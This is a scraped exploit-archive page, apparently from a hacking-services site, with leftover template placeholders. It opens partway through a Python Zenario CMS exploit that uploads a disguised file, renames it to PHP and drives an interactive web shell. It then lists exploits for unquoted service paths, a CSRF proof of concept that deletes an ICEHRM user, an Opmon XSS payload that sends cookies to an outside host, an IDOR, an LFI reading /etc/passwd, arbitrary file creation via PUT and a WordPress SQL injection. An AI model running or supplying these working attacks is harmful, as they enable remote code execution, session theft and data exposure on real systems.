v\n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\nCwDBAgAAvSsAAAAA\n" file_name = uuid.uuid4().hex file = open(file_name + ".docx", "wb") file.write(base64.decodebytes(file_content)) file.close() ### Upload docx file resp = requests.post(TARGET + "/zenario/ajax.php?method_call=handleAdminBoxAJAX&path=zenario_document_upload", headers={"Cookie":PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id":"", "fileUpload": 1, }, files={"Filedata": open(file_name + ".docx", "rb")}) ### Get sync id file resp_body = json.loads(resp.text) id_sync = resp_body["id"] # Update database resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"current_value":"' + id_sync + '"},"privacy":{"_display_value":false,"current_value":"public"}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"upload_document"}'}) # If upload OK print("Upload file OK!") ## Change file extension ### Search ID file in Database resp = requests.get(TARGET + "/zenario/admin/organizer.ajax.php?path=zenario__content/panels/documents&_sort_col=ordinal&_search=" + file_name, headers={"Cookie": PHPSESSID}) resp_body = json.loads(resp.text) file_id = resp_body["__item_sort_order__"]["0"] ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Change to .php resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_properties&id=" + str(file_id), headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_save": "true", "_confirm": "", "_box": '{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"php"},"document_title":{"current_value":""},"document_name":{"current_value":"' + file_name + '"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'}) ## Get public URL webshell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "generate_public_link": 1}) response_body = resp.text web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36] # If web shell OK print("Web shell is available!") print("URL:", web_shell_url) print("Enter command.") ## Execute command cmd = '' while cmd != "exit": ### Get command cmd = input("> ") ### Get result resp = requests.post(web_shell_url, data={"cmd": cmd}) response_body = resp.text result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")] print(result) pass ## Delete web shell resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX", headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"id": file_id, "delete": 1}) print("Web shell is deleted!") # Delete docx file os.remove(file_name + ".docx") print("Docx file is deleted!")
HireHackking
# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path # Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid) # Version: 2020.2.20328.2050 # Date: 02/04/2022 # Vendor Homepage: http://gimmal.com/ # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 # CVE: CVE-2022-23909 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Sherpa Connector Service Sherpa Connector Service C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe Auto C:\>sc qc "Sherpa Connector Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Sherpa Connector Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Sherpa Connector Service DEPENDENCIES : wmiApSrv SERVICE_START_NAME : LocalSystem
HireHackking
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion # Date: 29/03/2022 # Exploit Author: Devansh Bordia # Vendor Homepage: https://icehrm.com/ # Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS # Version: 31.0.0.OS #Tested on: Windows 10 # CVE: CVE-2022-26588 1. About - ICEHRM IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. 2. Description: The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. 3. Steps To Reproduce: 1.) Now login into the application and go to users. 2.) After this add an user with the name Devansh. 3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request. 4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/ 5.) Now generate a csrf poc for post based requests with necessary parameters. 6.) Finally open that html poc and execute in the same browser session. 7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability. 4. Exploit POC (Exploit.html) <html> <form enctype="application/x-www-form-urlencoded" method="POST" action=" http://localhost:8070/app/service.php"> <table> <tr> <td>t</td> <td> <input type="text" value="User" name="t"> </td> </tr> <tr> <td>a</td> <td> <input type="text" value="delete" name="a"> </td> </tr> <tr> <td>id</td> <td> <input type="text" value="6" name="id"> </td> </tr> </table> <input type="submit" value="http://localhost:8070/app/service.php"> </form> </html>
HireHackking

Opmon 9.11 - Cross-site Scripting

HACKER · %s · %s

# Exploit Title: Opmon 9.11 - Cross-site Scripting # Date: 2021-06-01 # Exploit Author: p3tryx # Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time # Version: 9.11 # Tested on: Chrome, IE and Firefox # CVE : CVE-2021-43009 # URL POC: <script> alert(document.cookie); var i=new Image; i.src="http://192.168.0.18:8888/?"+document.cookie; </script> Url-encoded Payload %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E ``` *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27};PAYLOAD&x=0&y=0 *https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter* <https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter> [search]=%27}; %3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E &x=0&y=0 ```
HireHackking

SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)

HACKER · %s · %s

# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.sma.de # Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R # Tested on: Linux [Firefox] # CVE : CVE-2021-46416 # Proof of Concept ============[ Normal user request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1 ============[ Manipulated username request ]============ GET / HTTP/1.1 Host: 192.168.1.4 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1
HireHackking
# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.franklinfueling.com/ # Version: 1.8.19.8580 # Tested on: Linux [Firefox] # CVE : CVE-2021-46417 # Proof of Concept ============[ HTTP Exploitation ]============ GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1 Host: 192.168.1.6 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B Upgrade-Insecure-Requests: 1 ============[ URL Exploitation ]============ http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
HireHackking

Telesquare TLR-2855KS6 - Arbitrary File Creation

HACKER · %s · %s

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46418 # Proof of Concept PUT /cgi-bin/testing_cve.txt HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: nonce=1642692359833588 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 32
HireHackking
# Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeMailboxAssistants [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeMailboxAssistants TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants DIPENDENZE : SERVICE_START_NAME : LocalSystem
HireHackking
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection # Date: 2022-04-11 # Exploit Author: Mohsen Dehghani (aka 0xProfessional) # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC: Vulnerable File:sync-urls-repository.php public function insertUrls($roomId, $urls) { global $wpdb; if (empty($urls)) { return; } $urls = $this->prepareUrls($urls); $values = array(); foreach ($urls as $syncId => $url) { $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url); } $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)" . " VALUES " . implode(', ', $values); $wpdb->query($sql); Vulnerable Parameter: room_id=SQL Injection sync_id=SQL Injection
HireHackking

Easy Appointments 1.4.2 - Information Disclosure

HACKER · %s · %s

